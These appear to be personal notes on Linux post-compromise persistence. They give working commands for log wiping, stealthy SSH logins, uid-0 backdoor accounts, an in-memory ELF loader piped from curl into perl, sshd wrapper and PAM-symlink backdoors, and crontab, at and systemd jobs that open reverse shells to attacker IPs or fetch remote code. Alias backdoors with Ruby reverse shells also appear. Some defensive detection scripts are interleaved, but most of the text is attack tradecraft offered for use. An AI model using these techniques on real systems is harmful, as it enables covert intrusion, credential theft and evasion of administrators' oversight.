Linux persistence

[TOC]

Linux persistence notes; polished and extended whenever I get around to it.

tips

## Check machine configuration

```bash
whoami && lscpu && free -h && df -h && lsb_release -a
```

## Catch the shell

```bash
rlwrap -S "$(printf '\033[95mds>\033[m ')" nc -nvlp 8880
```

## Someone else's automation script (DynastyPersist)

Piping a remote script straight into bash executes whatever that URL serves at that moment; read it first.

```bash
wget https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh
curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

$ ./dynasty.sh <lhost> <lport> <mode>
$ ./dynasty.sh ctf
$ ./dynasty.sh 10.10.14.3 9999 console

# inside the console mode:
show payloads
use x
```

## pty

```bash
which python python2 python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

## Covering tracks

```bash
# Delete only our own lines (here: client IPs beginning with 101) from the nginx access log
sed -i '/^101/d' /var/log/nginx/access.log

# Nuke everything. Chain with ';' rather than '&': the original used '&', which backgrounds
# each command, and `history -c` in a backgrounded subshell never touches this shell's history.
rm -rf /var/log/*; history -c; rm -rf ~/.bash_history
unset HISTFILE   # otherwise bash rewrites ~/.bash_history when this shell exits

# Auth and login records only
rm -rf /var/log/auth.log /var/log/secure /var/log/faillog /var/log/lastlog /var/log/wtmp
```

Wiping /var/log wholesale is loud: the gap in syslog/journald output and `last`/`lastlog` failing on missing files are indicators by themselves, and anything already forwarded to a remote syslog or SIEM is out of reach.

## Stealth login

```bash
# Skip profile and rc files: avoids hooks (alias backdoors, logging) in /etc/profile and ~/.bashrc
ssh username@hostname "bash --noprofile --norc"

# -T: no pseudo-terminal, so no utmp/wtmp entry; the session does not show up in w/who/last
ssh -T username@host /bin/bash -i

# Also keep the target out of the attacker's own known_hosts; then start an interactive bash by hand
ssh -o UserKnownHostsFile=/dev/null -T user@hostname
/bin/bash -if
```

sshd still records the authentication in auth.log or the journal; this only hides the session from utmp-based tools.

## Ports Cloudflare proxies

Useful when a listener has to sit behind a Cloudflare-proxied domain; the proxy only forwards these ports.

| HTTP ports | HTTPS ports |
|---|---|
| 80 | 443 |
| 8080 | 2053 |
| 8880 | 2083 |
| 2052 | 2087 |
| 2082 | 2096 |
| 2086 | 8443 |
| 2095 | |

## Add an account

```bash
## check which groups root belongs to
groups root

useradd config
passwd config
usermod -aG sudo config
usermod -aG root config
echo 'config    ALL=(ALL)       ALL' >> /etc/sudoers
visudo -c   # a syntax error in sudoers breaks sudo for everyone; validate before logging out
```

0. In-memory ELF execution

Advantage: nothing lands on disk, only an anonymous file; works well. It also combines with other techniques, e.g. passing the fd from memfd_create to fexecve.

Drawback: the process is still visible. `/proc/PID/exe` points at `/memfd:<name> (deleted)` and `/proc/PID/maps` shows the mapping, which is exactly what a defender greps for.

demo: https://asciinema.org/a/173715

A binary compiled against an older glibc runs on a newer one (a fully static build, as in the Go example below, has no glibc dependency at all).

```bash
## glibc version
ldd --version
## ldd (GNU libc) 2.17 -- the "ten" server runs an old one, so build against 2.17
~/tmp/elfshell-glibc-2.17 kali:8880
## other payloads I keep: exec.go, ~/elf/exec.pl, ~/tmp/sysConfig.pl, whose content is: curl http://xxx/xxx|sh
```

## memfd_create loader

```bash
# Put it in the background. Note that an ELF doing one-shot work (e.g. downloading a file)
# exits when it finishes; it does not loop.
Ctrl+z
bg
```

1. The file to execute. demoshell is only a placeholder: download it, set the IP:port, build it on the attack box. A Linux command written in C works just as well; any ELF can be substituted.

```bash
# https://gist.githubusercontent.com/magisterquis/ce8b99b42188f4517efb3e1038a483de/raw/cc9c2f96bc982b82ded64a734aeb850f73fd2f93/demoshell.go
go build -ldflags '--extldflags "-static -fpic"' -o elfshell ./demoshell.go
```

2. Write the head of elfload.pl

```bash
cat elfload.pl.head | tee elfload.pl
```

Contents of elfload.pl.head. Syscall 319 is memfd_create on x86_64 (the number is architecture-specific, e.g. 279 on aarch64) and flag 1 is MFD_CLOEXEC. The empty name is why the running process later reports `/memfd: (deleted)` as its executable.

```perl
#!/usr/bin/env perl
use warnings;
use strict;

$|=1;

print "Making anonymous file...";
my $name = "";
my $fd = syscall(319, $name, 1);   # memfd_create("", MFD_CLOEXEC) on x86_64
if (-1 == $fd) {
        die "memfd_create: $!";
}
print "fd $fd\n";

open(my $FH, '>&='.$fd) or die "open: $!";   # wrap the raw fd in a Perl filehandle
select((select($FH), $|=1)[0]);               # unbuffered writes

print "Writing ELF binary to memory...";
```

3. Append elfshell to elfload.pl: the ELF is read in 32-byte records and each becomes a `print $FH pack q/H*/, q/<hex>/` line

```bash
perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' elfshell >> elfload.pl
```

4. Append the tail to elfload.pl

```bash
cat elfload.pl.tail | tee -a elfload.pl
```

Contents of elfload.pl.tail. The exec goes through `/proc/$$/fd/$fd`, and "formsec" becomes argv[0], i.e. the name `ps` shows.

```perl
print "done\n";

print "Here we go...\n";
exec {"/proc/$$/fd/$fd"} "formsec"
        or die "exec: $!";
```

5. Use: fetch and pipe straight into perl; nothing is written to disk

```bash
curl http://1.1.1.1/elfload.pl|perl

curl http://xxx/xxx.pl|perl
```

Catch the shell:

```bash
rlwrap -S "$(printf '\033[95mds>\033[m ')" nc -nvlp 8880
```
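Hunting for such loaders comes down to what `/proc/PID/exe` resolves to. The snippet below is an added example, not part of these notes or of the magisterquis gist; `classify_exe` and `scan_memfd_processes` are names chosen here, and the readlink strings in the comments are constructed.

```shell
#!/bin/sh
# Added example: spot processes that run from an anonymous (memfd_create) file.
# After exec via /proc/$$/fd/N the kernel reports the executable as
#   /memfd:<name> (deleted)      e.g. "/memfd: (deleted)" for the empty name used above
# while a binary unlinked after launch reports "<path> (deleted)".

# classify_exe READLINK_TARGET -> prints memfd | deleted | ok
classify_exe() {
    case "$1" in
        /memfd:*)       echo memfd ;;
        *" (deleted)")  echo deleted ;;
        *)              echo ok ;;
    esac
}

# Walk /proc and print PID, verdict, argv[0] and exe target for every suspicious
# process. Run as root; exe links that cannot be read are skipped.
scan_memfd_processes() {
    for d in /proc/[0-9]*; do
        exe=$(readlink "$d/exe" 2>/dev/null) || continue
        kind=$(classify_exe "$exe")
        [ "$kind" = ok ] && continue
        argv0=$( { tr '\0' ' ' < "$d/cmdline"; } 2>/dev/null | cut -d' ' -f1)
        printf '%s\t%s\t%s\t%s\n' "${d#/proc/}" "$kind" "$argv0" "$exe"
    done
    return 0
}
```

With the loader above the exe shows `/memfd: (deleted)` while argv[0] reads `formsec`; that mismatch is the tell, and `/proc/PID/maps` lists the same anonymous mapping.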

1. sshd wrapper backdoor

Advantage: nothing to compile; a process exists only while a connection is open.

Drawback: sshd has to be restarted.

How it works: the real sshd is moved to /usr/bin/sshd and replaced by a Perl script. sshd re-executes itself for every incoming connection using its own argv[0], with the client socket on stdin, so every new connection passes through the wrapper. The wrapper calls getpeername() on stdin and inspects the packed sockaddr: two bytes of address family, then the client's source port in network byte order. `/^..4A/` therefore matches a source port of 0x3441 = 13377 (the ASCII bytes "4" and "A"); in that case it execs /bin/sh on the socket, otherwise it hands over to the real sshd with argv[0] still reading /usr/sbin/sshd.

```bash
##### one-liner on the victim
cd /usr/sbin/&&mv sshd ../bin/&&echo '#!/usr/bin/perl' >sshd&&echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd&&echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd&&chmod u+x sshd&&/etc/init.d/sshd restart

## victim, step by step
cd /usr/sbin/
mv sshd ../bin/

echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd

chmod u+x sshd
/etc/init.d/sshd restart     # systemd hosts: systemctl restart sshd (the unit is "ssh" on Debian/Ubuntu)

## attacker: connect from the magic source port
socat STDIO TCP4:vicIP:22,sourceport=13377
```

Caveats: from OpenSSH 9.8 the per-connection work is done by a separate sshd-session binary that the listener executes by its compiled-in path rather than by argv[0], so check which binary is actually re-executed on the target before relying on this. Defensively, `file /usr/sbin/sshd` reporting a script instead of an ELF, and `rpm -V openssh-server` / `dpkg -V openssh-server` flagging the changed file, both expose it.
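The arithmetic behind the `/^..4A/` check, plus the on-disk integrity check, as an added example that is not part of the original notes. `port_to_magic`, `magic_to_port` and `sshd_is_script` are names chosen here.

```shell
#!/bin/sh
# Added example: the bytes behind /^..4A/ and a quick integrity check.
# getpeername() gives the wrapper a packed sockaddr_in: 2 bytes of address
# family, then the client's source port in network byte order. The regex skips
# the family (..) and requires the port bytes to be the ASCII characters "4A",
# i.e. 0x34 0x41 = 13377, which is what socat's sourceport=13377 supplies.

# port_to_magic PORT -> the two port bytes, printed as characters
port_to_magic() {
    hi=$(( $1 / 256 ))
    lo=$(( $1 % 256 ))
    # build an octal-escape format string, e.g. "\064\101" for 13377
    printf "\\$(printf '%03o' "$hi")\\$(printf '%03o' "$lo")"
}

# magic_to_port "4A" -> 13377: the source port to hand to socat
#   socat STDIO TCP4:vicIP:22,sourceport=$(magic_to_port 4A)
magic_to_port() {
    c1=$(printf '%s' "$1" | cut -c1)
    c2=$(printf '%s' "$1" | cut -c2)
    echo $(( $(printf '%d' "'$c1") * 256 + $(printf '%d' "'$c2") ))
}

# sshd_is_script PATH -> success when the file is a "#!" script rather than an ELF,
# which is what /usr/sbin/sshd looks like once the wrapper is installed
sshd_is_script() {
    [ "$(head -c 2 "$1" 2>/dev/null)" = '#!' ]
}
```

Ports whose bytes are not printable (port 22 is 0x00 0x16, for instance) need `\x` escapes in the Perl regex, which is why memorable ports with printable bytes such as 13377 are used.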

2. sshd symlink backdoor (PAM service-name trick)

It did not work for me.

Why it can work, and what to check when it does not: sshd uses the basename of its argv[0] as the PAM service name, so a daemon started through a symlink called `su` authenticates against /etc/pam.d/su, which on most distributions contains `auth sufficient pam_rootok.so`. sshd runs as root, pam_rootok succeeds, and any password is accepted. Prerequisites: `UsePAM yes` and password authentication enabled in /etc/ssh/sshd_config (the daemon reads the normal config file whatever it is called), and `PermitRootLogin yes` if you log in as root (Ubuntu defaults to prohibit-password). Check with `grep pam_rootok /etc/pam.d/su` and `sshd -T | grep -Ei 'usepam|passwordauthentication|permitrootlogin'`; any of these can also be forced on the command line, e.g. `-oUsePAM=yes -oPasswordAuthentication=yes -oPermitRootLogin=yes`.

```bash
## new: copy the su policy under an innocuous service name and run sshd under that name
cp /etc/pam.d/su /etc/pam.d/java
#cp /etc/pam.d/su /etc/pam.d/postgres
ln -sf /usr/sbin/sshd /java;
#ln -sf /usr/sbin/sshd /postgres
/java -oPort=11212
#/postgres -oPort=5555

## old
ln -sf /usr/sbin/sshd /tmp/su;
/tmp/su -oPort=11212

## connect: any user, any password
ssh root@vicIP -p 11212
```

An sshd running under an odd name (`ps -eo pid,args | grep -E '/java|/tmp/su'`) or listening on an odd port (`ss -ltnp`) is how this gets found.

3. Building an OpenSSH backdoor

4. Scheduled tasks

Per-user crontab files live in:

  • /var/spool/cron/crontabs/username (Debian/Ubuntu)
  • /var/spool/cron/username (Red Hat/CentOS; /var/spool/cron/tabs/ is the SUSE layout)

Basic: deploy into the current user's crontab

```bash
## append to the current user's crontab
crontab -l | { cat; echo "*/1 * * * * bash -i >& /dev/tcp/192.168.44.128/2333 0>&1"; } | crontab -

# Hidden variant: the entry ends with \r followed by "no crontab for <user>" padded to 100 columns.
# On a terminal the carriage return moves the cursor back to column 0, so `crontab -l` or `cat`
# appears to print only "no crontab for user". `crontab -l | cat -A` shows the ^M and the real command.
(crontab -l;printf "*/1 * * * * bash -i >& /dev/tcp/192.168.44.128/5555 0>&1;\rno crontab for `whoami`%100c\n")|crontab -
```

Deploy into /etc/crontab: start an sshd on port 31337 every 5 minutes. The original used `* */5 * * *`, which fires every minute during hours divisible by 5; every five minutes is `*/5 * * * *`. Re-running while the old daemon is still bound simply fails, which is harmless and restarts it after a reboot or kill.

```bash
echo '*/5 * * * * root ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337' >> /etc/crontab
```
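An audit pass over cron content for the tricks in this section, as an added example that is not part of the original notes. `cron_audit` and `sample_crontab` are names chosen here, and the sample entries are constructed (they mirror the commands above; line 2 carries the carriage-return trick, line 4 is benign).

```shell
#!/bin/sh
# Added example: audit a crontab or cron.d file for the tricks in this section.
# cron_audit FILE (use - for stdin, e.g. `crontab -l | cron_audit -`)
# prints one finding per line as "<line>\t<reason>":
#   hidden-cr      a carriage return in the entry; text after it overwrites the real
#                  command when displayed on a terminal (the "no crontab for user" trick)
#   reverse-shell  uses bash's /dev/tcp or /dev/udp
#   pipe-to-shell  output of curl/wget/base64 -d piped into a shell or interpreter
cron_audit() {
    awk '
        /\r/ { printf "%d\thidden-cr\n", NR }
        /\/dev\/(tcp|udp)\// { printf "%d\treverse-shell\n", NR }
        /(curl|wget|base64 -d|base64 --decode)[^|]*\|[ \t]*((ba)?sh|perl|python[0-9.]*)([ \t]|$)/ {
            printf "%d\tpipe-to-shell\n", NR
        }
    ' "$1"
}

# Constructed sample, not taken from a real host
sample_crontab() {
    printf '*/1 * * * * bash -i >& /dev/tcp/192.168.44.128/2333 0>&1\n'
    printf '*/1 * * * * bash -i >& /dev/tcp/192.168.44.128/5555 0>&1;\rno crontab for root\n'
    printf '*/1 * * * * root curl http://xxx/a|sh\n'
    printf '0 3 * * * /usr/bin/logrotate /etc/logrotate.conf\n'
}
```

Point it at `/etc/crontab`, every file under `/etc/cron.d/` and each user's spool file; the carriage-return check is the one `crontab -l` on a terminal will never show you.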

Deploy into /etc/cron.*/

```bash
## kali is already listening; write "bounce to 443 every minute" into 0hourly, plus a direct reverse shell to 443
echo '*/1 * * * * root curl http://xxx/a|sh' >> /etc/cron.d/man-db

echo '*/1 * * * * root echo base64EncodeText|base64 -d|sh' >> /etc/cron.d/0hourly
echo '*/1 * * * * root echo base64EncodeText|base64 -d|sh' >> /etc/cron.d/man-db
```

Entries in /etc/cron.d carry a user field (root above), and on Debian the file name may only contain letters, digits, underscores and hyphens; the names are chosen to look package-owned (0hourly exists on RHEL-style systems).

at runs a job once, so it is only periodic if the job re-queues itself; not great

```bash
# /tmp/... is a script that queues itself again one minute out and then spawns the shell,
# so each run schedules the next (the path is elided in these notes)
echo "at now+1min <<EOF" >> /tmp/...
echo "bash /tmp/..." >> /tmp/...
echo "EOF" >> /tmp/...
echo "bash -i >& /dev/tcp/192.168.44.123/10092 0>&1;" >> /tmp/...

# kick it off
at now+1min <<EOF
bash /tmp/...
EOF
```

at with a remote C2; not great

```bash
#c2 server
echo "at now+1min <<EOF" >> /tmp/...
echo "curl http://xxx/xxx | sh" >> /tmp/...
echo "EOF" >> /tmp/...
echo "bash -i >& /dev/tcp/xxx/8080 0>&1;" >> /tmp/...
python3 -m http.server 80

#victim
at now+1min <<EOF
curl http://xxx/config | sh
EOF
at -f /xx/xx now + 1 minute
echo "curl http://xxx | sh" | at now + 1 minute
```

Queued jobs are listed by `atq` and stored under /var/spool/cron/atjobs (Debian) or /var/spool/at (RHEL).

5. Backdoor accounts

```bash
# remove a user
userdel -f xx

# shadow root account (uid 0) with a login shell
# --stdin is RHEL-only; the portable form is: echo 'config:xxx' | chpasswd
useradd -u 0 -o -g root -G root -M -s /bin/bash config && echo "xxx" | passwd config --stdin
passwd config
# sshd takes the first value it sees for a keyword, so an earlier "no" wins over this appended line; verify with sshd -T
echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config

# unprivileged backdoor account with a name that blends in; usable for mining, botnets, etc.
useradd -d /x -c "config" -s /bin/bash config -m
useradd -d /home/... -s /bin/bash x -m

## CentOS 7: create a uid 0 user from the command line
# 1. directly
useradd -o -u 0 config && echo "xxx" | passwd config --stdin
# 2. via /root/.bashrc plus PROMPT_COMMAND: runs before every prompt of a root shell, creates the user, then unsets itself
echo 'export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 config &>/dev/null && echo config:xxx | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"'>>/root/.bashrc

## Ubuntu: create a uid 0 user with a pre-hashed password
# -p takes the hash itself; the original "-p 0 `openssl ...`" set the hash to "0" and passed the real hash as a stray positional argument
useradd -p "$(openssl passwd -1 -salt 'abc' xxx)" -u 0 -o -g root -G root -s /bin/bash config
```
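The checks that catch these accounts, as an added example not taken from the original notes. Function names are chosen here, and the passwd, group and bashrc samples are constructed to contain exactly the artefacts the commands above leave behind.

```shell
#!/bin/sh
# Added example: find the account-level backdoors from this section in
# passwd/group/bashrc text. Each function takes a file path, so it can be pointed
# at /etc/passwd, /etc/group and /root/.bashrc on a live host, or at copies.

# Accounts with UID 0 other than root (useradd -o -u 0 ...)
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Any UID shared by more than one account (-o permits this), printed as "uid: name name"
shared_uids() {
    awk -F: '{ n[$3]++; names[$3] = names[$3] " " $1 }
             END { for (id in n) if (n[id] > 1) print id ":" names[id] }' "$1" | sort
}

# Members of groups that confer root (usermod -aG sudo/wheel/root), as "group: members"
privileged_group_members() {
    awk -F: '($1 == "sudo" || $1 == "wheel" || $1 == "root") && $4 != "" { print $1 ": " $4 }' "$1"
}

# Startup-file hooks: PROMPT_COMMAND or account manipulation in a shell rc file
rc_hooks() {
    grep -nE 'PROMPT_COMMAND|useradd|usermod|chpasswd|passwd --stdin' "$1"
}

# Constructed sample data, not from a real system
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
config:x:0:0::/home/config:/bin/bash
postgres:x:1001:1001::/var/lib/postgresql:/bin/bash
EOF
}
sample_group() {
    cat <<'EOF'
root:x:0:
wheel:x:10:
sudo:x:27:ubuntu,config
postgres:x:1001:
EOF
}
sample_bashrc() {
    cat <<'EOF'
# .bashrc
alias ll='ls -l --color=auto'
export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 config &>/dev/null && echo config:xxx | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"
EOF
}
```

On a real host also diff `/etc/passwd` against `/etc/shadow` entries and check `/var/log/secure` or `auth.log` for the `useradd` line itself; the PROMPT_COMMAND hook is the one that leaves no process behind, so the rc files are the only place it shows.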

6. Public key

```bash
## Point AuthorizedKeysFile in /etc/ssh/sshd_config at an unexpected path so the real key is not in ~/.ssh
cat /etc/ssh/sshd_config|grep AuthorizedKeysFile
# desired effective value. The original set ".cache", which names a file, while the steps below
# create .cache/ssh.rc; the two must match
AuthorizedKeysFile    .cache/ssh.rc
echo "AuthorizedKeysFile    .cache/ssh.rc" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
# sshd uses the first occurrence of a keyword, so an appended line loses to an existing one;
# verify with: sshd -T | grep -i authorizedkeysfile   (then reload sshd)

# other users: hardlink the existing authorized_keys into the new location
mkdir -p ~/.cache
ln /root/.ssh/authorized_keys ~/.cache/ssh.rc

# target user: append our public key (xxxxxxx stands for the key line)
home=$(getent passwd "$target_user" | cut -d: -f6)   # ~${target_user} does not expand in bash
mkdir -p "$home/.cache"
echo -e "\n\nxxxxxxx\n\n" >> "$home/.cache/ssh.rc"

# normal users' existing key logins keep working; only the target user needs maintaining
```

If AuthorizedKeysFile lists only the new path, ~/.ssh/authorized_keys is no longer consulted for anyone. Either list both (`AuthorizedKeysFile .ssh/authorized_keys .cache/ssh.rc`; the option takes several space-separated paths) or hardlink every existing user's authorized_keys into the new location as above, otherwise legitimate key logins break, which gets noticed.

7. Alias backdoor

Advantage: buried deep; but complex commands or a slow network add a delay to `ls`, which can get it noticed.

Drawback: needs an opportunity, e.g. the target running a yum update.

Note on quoting: inside double quotes `$*` expands when the alias is defined, so the original dropped the arguments given to `ls`; it is escaped as `\$*` below so the expansion happens when the function runs.

```bash
## ruby reverse shell over plain TCP (catch with nc)
alias ls="alerts(){ ls \$* --color=auto;ruby -rsocket -e 'exit if fork;c=TCPSocket.new("'"'"attackMa"'"'","'"'"443"'"'");while(cmd=c.gets);IO.popen(cmd,"'"'"r"'"'"){|io|c.print io.read}end';};alerts"

## ruby reverse shell over TLS (catch with msf)
alias ls="alerts(){ ls \$* --color=auto;ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new("'"'"192.168.242.1"'"'","'"'"5555"'"'")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,"r"){|io|c.print io.read}end';};alerts"

## Also alias alias and unalias themselves, drop the file somewhere inconspicuous; ls then reverse-connects on every run.  vi /etc/yum/yum-update.rc
# The heredoc delimiter must be quoted ('EOF'): unquoted, the shell expands $* and $# while writing the file
cat > /etc/yum/yum-update.rc <<'EOF'
alias ls="alerts(){ ls \$* --color=auto;ruby -rsocket -e 'exit if fork;c=TCPSocket.new("'"'"attackMa"'"'","'"'"443"'"'");while(cmd=c.gets);IO.popen(cmd,"'"'"r"'"'"){|io|c.print io.read}end';};alerts"
alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'
alias alias="cat /tmp/.alias.txt"
EOF
```

Put the following into /tmp/.alias.txt (the fake output shown whenever someone types `alias`)

```bash
cat > /tmp/.alias.txt <<'EOF'
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias grep='grep --color=auto'
alias l.='ls -d .* --color=auto'
alias ll='ls -l --color=auto'
alias ls='ls --color=auto'
alias vi='vim'
alias which='alias | /usr/bin/which --tty-only --read-alias --show-dot --show-tilde'
EOF

# copy atime/mtime from a package file so the rc does not stand out; ctime cannot be set this way and stat still shows it
cd /etc/yum/&&touch -acmr version-groups.conf yum-update.rc
```

Nothing sources /etc/yum/yum-update.rc on its own: a `. /etc/yum/yum-update.rc` line in a file bash reads at startup (/etc/bashrc, /etc/profile.d/*.sh or ~/.bashrc) is still needed, and these notes do not show that step. The aliased `alias` and `unalias` only fool someone typing them; `builtin alias`, `type ls` (which prints "ls is aliased to ...") and `declare -p BASH_ALIASES` bypass the alias table and show the real definitions.

```bash
## hash backdoor
# bash caches command paths; hash -p pins "ls" to /usr/bin/pwd, so typing ls runs pwd
echo "hash -p /usr/bin/pwd ls" >> /etc/profile
## does not work: hash -p wants a path, not a command line
echo "hash -p 'useradd -o -u 0 config && echo "'"'"xxx"'"'" | passwd config --stdin' ls" >> /etc/profile
```

`type ls` reveals this one too ("ls is hashed (/usr/bin/pwd)"), and `hash -r` clears it for the session.

8. systemd service backdoor

Advantage: not easily noticed unless someone reads the unit files.

Drawback: needs an opportunity.

It did not work for me. Two things in the units as first written explain that: systemd does not pass ExecStart= through a shell, so `curl http://xxx/xxx.pl|perl` runs curl with "|" and "perl" as two extra URL arguments, and `Type=forking` makes systemd wait for the command to daemonize, which a curl pipeline never does. Wrapping the pipeline in `/bin/sh -c '...'`, using an absolute program path and `Type=simple` fixes both; the units below are the corrected form (the empty `ExecReload=`/`ExecStop=` lines did nothing and are dropped).

```bash
1. ## run a shell at boot
cat > /usr/lib/systemd/system/config.service <<'EOF'
[Unit]
Description=Systemctl Config.
After=network.target

[Service]
Type=simple
ExecStart=/bin/sh -c 'curl http://xxx/xxx.pl | perl'
PrivateTmp=true

[Install]
WantedBy=multi-user.target
EOF

systemctl daemon-reload
systemctl enable config
systemctl start config

2. ## cron-like: start again 12 s after every exit
cat > /usr/lib/systemd/system/guard.service <<'EOF'
[Unit]
Description=guard
After=network.target

[Service]
Type=simple
ExecStart=/bin/sh -c 'curl http://xxx/xxx.pl | perl'
Restart=always
RestartSec=12s

[Install]
WantedBy=default.target
EOF

systemctl daemon-reload
systemctl enable guard
systemctl start guard
```

Keep RestartSec above a couple of seconds or add `StartLimitIntervalSec=0` to [Unit]; otherwise the default start-rate limit (5 starts within 10 s) puts the unit into a failed state when curl exits immediately. Defensively, `systemctl list-unit-files --state=enabled` and a grep for `sh -c` across /usr/lib/systemd/system and /etc/systemd/system, combined with `rpm -qf` / `dpkg -S` to find unit files no package owns, surface these.
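A small linter for the mistakes above, as an added example that is not part of the original notes. `unit_check` and the two sample units are names and texts constructed here; the broken sample is the unit as first written, the fixed sample the corrected form.

```shell
#!/bin/sh
# Added example: lint ExecStart=/Type= in a unit file for the mistakes that made the
# original units fail. unit_check FILE (or - for stdin) prints "<reason>\t<detail>":
#   shell-metachar-without-sh-c   ExecStart contains | ; or & but is not /bin/sh -c ...;
#                                 systemd hands those characters to the program literally
#   relative-program              ExecStart does not start with an absolute path
#   type-forking                  Type=forking waits for the command to daemonize, which
#                                 a curl | perl pipeline never does; use Type=simple
unit_check() {
    awk '
        /^Type=/ { type = substr($0, 6) }
        /^ExecStart=/ {
            cmd = substr($0, 11)
            if (cmd ~ /[|;&]/ && cmd !~ /^[-@+!:]*\/(usr\/)?bin\/(ba)?sh[ \t]+-c/)
                printf "shell-metachar-without-sh-c\t%s\n", cmd
            if (cmd !~ /^[-@+!:]*\//)
                printf "relative-program\t%s\n", cmd
        }
        END { if (type == "forking") printf "type-forking\tType=%s\n", type }
    ' "$1"
}

# Constructed samples: the unit as first written, and the corrected form
sample_unit_broken() {
    cat <<'EOF'
[Unit]
Description=Systemctl Config.
After=network.target
[Service]
Type=forking
ExecStart=curl http://xxx/xxx.pl|perl
[Install]
WantedBy=multi-user.target
EOF
}

sample_unit_fixed() {
    cat <<'EOF'
[Unit]
Description=Systemctl Config.
After=network.target
[Service]
Type=simple
ExecStart=/bin/sh -c 'curl http://xxx/xxx.pl | perl'
[Install]
WantedBy=multi-user.target
EOF
}
```

Run it as `unit_check /usr/lib/systemd/system/config.service` before `systemctl start`; `systemctl status` and `journalctl -u config` give the same answer after the fact, but only after the unit has already failed and been logged.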

9. PAM backdoor

Linux PAM backdoor summary and extensions - 先知社区

10. rootkit

Automation scripts.

For stealing account passwords, a PAM backdoor or a patched OpenSSH build is more stable and harder to spot.

updated 2024-04-21